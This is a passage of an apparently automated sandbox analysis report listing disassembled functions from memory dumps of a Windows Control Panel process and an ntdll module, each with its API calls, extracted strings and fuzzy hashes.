                                    • Part of subcall function 0087A9EC: CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0(?,?,-00000002,-00000004,-00000002,?,Shell32.dll,Control_RunDLL ,-00000002,?,?), ref: 0087AAE7
                                  • CompareStringOrdinal.KERNEL32(?,000000FF,Microsoft.System,000000FF,00000001,?,?), ref: 008739BC
                                  • CompareStringOrdinal.KERNEL32(?,000000FF,{BB06C0E4-D293-4f75-8A90-CB05B6477EEE},000000FF,00000001,?,?), ref: 008739D9
                                  • CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0(?,?,?), ref: 00873A15
                                  • StrCmpICW.SHLWAPI(00871020,-00000002,?,?), ref: 00873A43
                                  • IsOS.SHLWAPI(FFFFFFFF,?,?), ref: 00873A56
                                  • CompareStringOrdinal.KERNEL32(008719E8,000000FF,Microsoft.System,000000FF,00000001,?,?), ref: 00873A8F
                                    • Part of subcall function 0087AD62: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002,-00000002,?,?), ref: 0087AD74
                                    • Part of subcall function 0087AD62: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00871428,00000000,00000001,00871900,?,00000000,?,?), ref: 0087AD91
                                    • Part of subcall function 0087AD62: CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 0087ADCD
                                  • StrCmpICW.SHLWAPI(NETCONNECTIONS,-00000002,?,?), ref: 00873B6C
                                  • StrCmpICW.SHLWAPI(ncpa.cpl,-00000002,?,?), ref: 00873B80
                                  • lstrlenW.KERNEL32(?,?,?,?), ref: 00873BCA
                                  • AllowSetForegroundWindow.USER32(000000FF), ref: 00873C32
                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00873C3F
                                  • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00873CF3
                                  • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00871428,00000000,00000001,00871900,?), ref: 00873D14
                                  • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00873D54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CompareOrdinalString$CreateFreeInitializeInstanceTaskUninitialize$AllowExecuteForegroundHeapInformationShellWindowlstrlen
                                  • String ID: %SystemRoot%\system32\rundll32.exe$%s%s$%s%s %s$%s\%s%s$::{7007ACC7-3202-11D1-AAD2-00805FC1270E}$<$Microsoft.System$NETCONNECTIONS$PANEL$Shell32.dll,Control_RunDLL $ncpa.cpl$open${BB06C0E4-D293-4f75-8A90-CB05B6477EEE}
                                  • API String ID: 2671181447-2540027045
                                  • Opcode ID: 10d7e9d2f1d8dee626fbaff82d85f28af28eb8f81c5eb10f68574735c586827f
                                  • Instruction ID: 351123b3a2faa8acfc5457ff7910dbe5b763de1f07f27248e7b6d33fab15e039
                                  • Opcode Fuzzy Hash: 10d7e9d2f1d8dee626fbaff82d85f28af28eb8f81c5eb10f68574735c586827f
                                  • Instruction Fuzzy Hash: 99C19531A003299BDB20DB58CC49B9EB7B8FB45310F5081A9E91DE7688DB70DE85DB52
                                  Function 00874775 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 008747A2
                                  • GetCurrentProcessId.KERNEL32 ref: 008747B1
                                  • GetCurrentThreadId.KERNEL32 ref: 008747BA
                                  • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 008747C3
                                  • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 008747D8
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                  • String ID:
                                  • API String ID: 1445889803-0
                                  • Opcode ID: 5a9bf68d428a5fa5a5ccb9a8f368ea166a7c292f2f0a75e0924f8b1d5aa00e60
                                  • Instruction ID: 1dbb986f3a6c4440081a5f4dd286d8eec040abec464c3acc91024e261ab162ce
                                  • Opcode Fuzzy Hash: 5a9bf68d428a5fa5a5ccb9a8f368ea166a7c292f2f0a75e0924f8b1d5aa00e60
                                  • Instruction Fuzzy Hash: 4511F571D01608EBCB10DFB8DA4869EB7F4FF58310F914869D40AE7228E730DA41CB50
                                  Function 008742F0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00874426,00871000), ref: 008742F7
                                  • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00874426,?,00874426,00871000), ref: 00874300
                                  • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00874426,00871000), ref: 0087430B
                                  • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00874426,00871000), ref: 00874312
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                  • String ID:
                                  • API String ID: 3231755760-0
                                  • Opcode ID: 98becc174a325d6019f0b124d6be5a6dd79e928eefa329d5d98d7b757e91ee62
                                  • Instruction ID: 9ba691d21d2204776714c067e36cbb2732f9ff38b75cc0c523a7b4f2c8f7f989
                                  • Opcode Fuzzy Hash: 98becc174a325d6019f0b124d6be5a6dd79e928eefa329d5d98d7b757e91ee62
                                  • Instruction Fuzzy Hash: CFD0C932004304BBC6003BE1EC0DA49BF39FF44612F804010F31D82424DA32C4818B72
                                  Function 008772CE Relevance: 3.8, APIs: 3, Instructions: 22memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0087C510,0087C510,00879694,00000000,00000000,0087C49C,?,00879540,0087C550,?,00879642,00000000,0087C474,0087C470), ref: 008772D3
                                  • HeapAlloc.KERNEL32(00000000,?,00879540,0087C550,?,00879642,00000000,0087C474,0087C470,?,00878A6D,0087C550,00000008,?,00875F7C,0087C550), ref: 008772DA
                                  • GetProcessHeap.KERNEL32(00000000,0087C49C,?,00879540,0087C550,?,00879642,00000000,0087C474,0087C470,?,00878A6D,0087C550,00000008,?,00875F7C), ref: 008772ED
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Alloc
                                  • String ID:
                                  • API String ID: 651230671-0
                                  • Opcode ID: 244a13a31b37884d06712a2b352d2a3b8003c3c2f4627636a9846a7a394872f5
                                  • Instruction ID: bbf324b7d94df28d9c2fe984c5b4888ba03eae018d3886cf7c5a94a87b749d59
                                  • Opcode Fuzzy Hash: 244a13a31b37884d06712a2b352d2a3b8003c3c2f4627636a9846a7a394872f5
                                  • Instruction Fuzzy Hash: 74E0EC75605210ABC6102775BD1C92B3E7EFFC5762F455059F91DC3228CA34CC82DA74
                                  Function 008769F5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,00876DE3,?,?,?,?,?,?,?,?,?,?,?,00877A2F,?), ref: 00876A1B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: DebuggerPresent
                                  • String ID:
                                  • API String ID: 1347740429-0
                                  • Opcode ID: 1bfda7bca0d8d58bad251d9f01cee2ce86af6145ffd2da30124323d6f6944287
                                  • Instruction ID: c9fee5560e16bdfc8c74d63a69dd95855a4fff3c75db9710e3472695a14445bf
                                  • Opcode Fuzzy Hash: 1bfda7bca0d8d58bad251d9f01cee2ce86af6145ffd2da30124323d6f6944287
                                  • Instruction Fuzzy Hash: 01E08661692F314FD7112B546CC87B5AA58BF65714714E019D40DE7118E600CCD65760
                                  Function 00874550 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_00004500), ref: 00874555
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 16eaa54e70102cea0d5d82f913d78b176eeac023f6e2d3aea487d879683839c1
                                  • Instruction ID: e4a53be8c65ba005b93d1df862299dffd9231b22b9d6ef6b0fcde94d20af7a47
                                  • Opcode Fuzzy Hash: 16eaa54e70102cea0d5d82f913d78b176eeac023f6e2d3aea487d879683839c1
                                  • Instruction Fuzzy Hash: 069002A4255200C7860027707C0D405B6A1FE59A037819450A039C416DEB64C0409A21
                                  Function 00876379 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 165windowthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FormatMessageW.KERNEL32(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00876451
                                  • GetCurrentThreadId.KERNEL32 ref: 008764B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CurrentFormatMessageThread
                                  • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                  • API String ID: 2411632146-3173542853
                                  • Opcode ID: 8a88e658af420c78c4c985440cb01be9da8b9950d034df4eee87d48135c76ca4
                                  • Instruction ID: a8c16e2d2b49bf756278806c76d7aa94d53a0cea48de956903f0303ebd5a3153
                                  • Opcode Fuzzy Hash: 8a88e658af420c78c4c985440cb01be9da8b9950d034df4eee87d48135c76ca4
                                  • Instruction Fuzzy Hash: 41511272900B00AACF305F69CC4DE277AB9FB45700F14C95DF11ED262AE631EAA0CB25
                                  Function 04D82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: e51510e7e9f16d7aebff0ab941d1fea1547f13d978421b486a2f3c2dff79deb6
                                  • Instruction ID: 5615d3f7c7bdd47235fcf2ecfa1bdd8894129870732c7af2f6f50870836ec25a
                                  • Opcode Fuzzy Hash: e51510e7e9f16d7aebff0ab941d1fea1547f13d978421b486a2f3c2dff79deb6
                                  • Instruction Fuzzy Hash: B551A4B5B0011ABBDF10EF98989097EF7F8BB493047548269E4A9D7641E234FE548BE0
                                  Function 04DF2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 02e8884a06e49b6d7a988934eb5bec1fe42f40270404064e3c28934587758666
                                  • Instruction ID: 712060aa9fae9385369d305a39c8640bc342758c60dcc1d52dcb8dce30a79c95
                                  • Opcode Fuzzy Hash: 02e8884a06e49b6d7a988934eb5bec1fe42f40270404064e3c28934587758666
                                  • Instruction Fuzzy Hash: F551F175B00645ABDB30DF9CCC9087FB7F8EB44304B018899E6D6D7681E6B5FA408B60
                                  Function 0087A9EC Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 100COMMON
                                  Download Yara Rule
                                  APIs
                                  • StrCmpICW.SHLWAPI(00000000,/name,?,-00000002,-00000004,-00000002,?,Shell32.dll,Control_RunDLL ,-00000002,?,?), ref: 0087AA4B
                                  • StrCmpICW.SHLWAPI(00000000,-name,?,?), ref: 0087AA5B
                                  • StrCmpICW.SHLWAPI(00000000,/page,00000000,?,?), ref: 0087AA9D
                                  • StrCmpICW.SHLWAPI(00000000,-page,?,?), ref: 0087AAAD
                                  • CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0(?,?,-00000002,-00000004,-00000002,?,Shell32.dll,Control_RunDLL ,-00000002,?,?), ref: 0087AAE7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: FreeTask
                                  • String ID: -name$-page$/name$/page$Shell32.dll,Control_RunDLL
                                  • API String ID: 734271698-926733048
                                  • Opcode ID: 365ed42e3441882a1f944aaaa83d5934994663204aa4680de2bc712189f5d6f3
                                  • Instruction ID: d0cfb2aa8a2f10718a733c961322ebcc3be9db518d7399666c6e9e1984774470
                                  • Opcode Fuzzy Hash: 365ed42e3441882a1f944aaaa83d5934994663204aa4680de2bc712189f5d6f3
                                  • Instruction Fuzzy Hash: 0921E8356046216B871DEB298E569BFB769FFD0340709C558EC1CE3218EB30DE01C7A2
                                  Function 04D77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • ExecuteOptions, xrefs: 04DB46A0
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04DB4655
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04DB4725
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04DB46FC
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04DB4742
                                  • Execute=1, xrefs: 04DB4713
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04DB4787
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 2b198c79ab322e5ae49b52b00bc8ae094044107dbe9bae0818d88840e4bad281
                                  • Instruction ID: 7f74f0245daa9f68429d5daa3849958f3c0ec6446df41c980c0f1a0547543838
                                  • Opcode Fuzzy Hash: 2b198c79ab322e5ae49b52b00bc8ae094044107dbe9bae0818d88840e4bad281
                                  • Instruction Fuzzy Hash: C851D331700219BAEB11FBA4DC95FFE73A8FB44708F1408A9E505A7181FB71BA45CEA0
                                  Function 00874060 Relevance: 12.1, APIs: 8, Instructions: 146sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStartupInfoW.KERNEL32(?,0087AFD8,00000058), ref: 0087407F
                                  • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8), ref: 008740B4
                                  • _amsg_exit.MSVCRT ref: 008740C9
                                  • _initterm.MSVCRT ref: 0087411D
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00874149
                                  • exit.MSVCRT ref: 008741BF
                                  • _ismbblead.MSVCRT ref: 008741DA
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_initterm_ismbbleadexit
                                  • String ID:
                                  • API String ID: 359039474-0
                                  • Opcode ID: cb4f2a96cf809e59162523587082532cd29a651b263d41cd2f131be265d09189
                                  • Instruction ID: 9b844a51883c9ac84098fff6401d269f13c40356472223e7305a74336eea8894
                                  • Opcode Fuzzy Hash: cb4f2a96cf809e59162523587082532cd29a651b263d41cd2f131be265d09189
                                  • Instruction Fuzzy Hash: DF41C131944728CBDB21AB68984876A77F4FB55721F60D02AE91DD739DCB74C8C08BA1
                                  Function 008768B6 Relevance: 12.1, APIs: 8, Instructions: 100synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000,?), ref: 008768C9
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: ObjectSingleWait
                                  • String ID:
                                  • API String ID: 24740636-0
                                  • Opcode ID: 20e53d0683a5f8c48ae20a32339e480658cfabc5f41c9e39bd93bd80574afc2c
                                  • Instruction ID: b01de72a99009b3fb725df29aada73f53a5e9107537443a6e87984a71ffbeb63
                                  • Opcode Fuzzy Hash: 20e53d0683a5f8c48ae20a32339e480658cfabc5f41c9e39bd93bd80574afc2c
                                  • Instruction Fuzzy Hash: 2D319370700A09ABEB204B659D88BAB3A69FF81358F248035F60ED658CF774CD529752
                                  Function 0087AAF8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 112registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,?,0000030C,-00000002), ref: 0087AB79
                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00000104,00000000,?,?,?), ref: 0087ABD8
                                  • StrCmpICW.SHLWAPI(?,?), ref: 0087AC07
                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,-000000FA), ref: 0087AC39
                                  • RegCloseKey.ADVAPI32(?), ref: 0087AC65
                                  Strings
                                  • Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls, xrefs: 0087AB2C
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CloseEnumEnvironmentExpandOpenStringsValue
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
                                  • API String ID: 1747309050-2787898152
                                  • Opcode ID: b3568f9e2f8c44dcba5b9df8f9a90252cfedc0bafce844e352ff4dbcc2551fdf
                                  • Instruction ID: a0c06a9e965f862baf2e7052d97f4692ed267ca6cd881ce5cc788ab6bae749d4
                                  • Opcode Fuzzy Hash: b3568f9e2f8c44dcba5b9df8f9a90252cfedc0bafce844e352ff4dbcc2551fdf
                                  • Instruction Fuzzy Hash: 664169B1A00228AFDB29DF54CC84BAE767AFB95310F0041A5E50EE7254DA729E94CF52
                                  Function 00877162 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                  Download Yara Rule
                                  APIs
                                  • AcquireSRWLockShared.KERNEL32(?), ref: 00877178
                                  • ReleaseSRWLockShared.KERNEL32(?), ref: 00877190
                                  • EnterCriticalSection.KERNEL32(?), ref: 008771AF
                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 008771B6
                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008771F9
                                  • LeaveCriticalSection.KERNEL32(?), ref: 00877222
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: Lock$AcquireCriticalExclusiveReleaseSectionShared$EnterLeave
                                  • String ID:
                                  • API String ID: 3221859647-0
                                  • Opcode ID: aefbbb21af2d750c859708f58dd0a57f1f2bddc965832ce30c647de8b86ed957
                                  • Instruction ID: 4e0dc98fc880d0895e6725c798c854c6dc4a74948eb9de0d9fc5639d41eac1f2
                                  • Opcode Fuzzy Hash: aefbbb21af2d750c859708f58dd0a57f1f2bddc965832ce30c647de8b86ed957
                                  • Instruction Fuzzy Hash: A1213B766083428BC714DF28D88891ABBBAFF94311F41496DF85AD7355DB30D889CBA2
                                  Function 04D8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 0d82599263030bf92f2b18f50f6bbd0a3999bcdb29c3d9881b7e1cf44079e433
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 26818070E053499EDF24EE68C8517BEBBB1BF45310F18455FF861AB291D634B8418B64
                                  Function 0087A25E Relevance: 9.0, APIs: 7, Instructions: 228memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0087A28A
                                  • GetProcessHeap.KERNEL32(00000000,?,008798B0,?,?,008798B0,00000001,00000000,00000000,?,?,?,?,?,008798B0,?), ref: 0087A316
                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,008798B0,?,?,?,?,00000001,?), ref: 0087A31D
                                  • GetProcessHeap.KERNEL32(00000000,008798B0,008798B0,?,?,008798B0,00000001,00000000,00000000,?,?,?,?,?,008798B0,?), ref: 0087A326
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,008798B0,?,?,?,?,00000001,?), ref: 0087A32D
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,008798B0,?,?,?,?,?,008798B0,?,?,?), ref: 0087A4C6
                                  • HeapFree.KERNEL32(00000000,?,?,00000000,008798B0,?,?,?,?,?,008798B0,?,?,?,?,00000001), ref: 0087A4CD
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                  • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free$Allocmemset
                                  • String ID:
                                  • API String ID: 4078862186-0
                                  • Opcode ID: 242ae5ba5444432887ba15b748f12193d5d6fcbcd9756373fc08312aae975774
                                  • Instruction ID: 1eb3a4cc597b78aa2482982dc5673e75b1fbee7399a32e22eb279a055d312453
                                  • Opcode Fuzzy Hash: 242ae5ba5444432887ba15b748f12193d5d6fcbcd9756373fc08312aae975774
                                  • Instruction Fuzzy Hash: 7D817671D002199FDB08CFA9C8846BEB7B4FF58300F14C16AE819EB645E774D981CB65
                                  Function 04DF20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: de3e142c1b090ff70191c43fb663f5aa2283085cf9bc8d2c320785f2d5553371
                                  • Instruction ID: 8156da702e878eaf64e4fd2586c3f37ce83469120ef611affc0d5e5b0e7f9e4c
                                  • Opcode Fuzzy Hash: de3e142c1b090ff70191c43fb663f5aa2283085cf9bc8d2c320785f2d5553371
                                  • Instruction Fuzzy Hash: 66213376A00119ABDB21DEA9DC40AFE77F8EF54744F450156EA05D3240E731E9058BA5
                                  Function 00873830 Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCommandLineW.KERNEL32(?,00000002), ref: 0087383A
                                  • StrTrimW.SHLWAPI(-00000002,00871420), ref: 00873862
                                  • memset.MSVCRT ref: 00873870
                                  • GetStartupInfoW.KERNEL32(?), ref: 0087387C
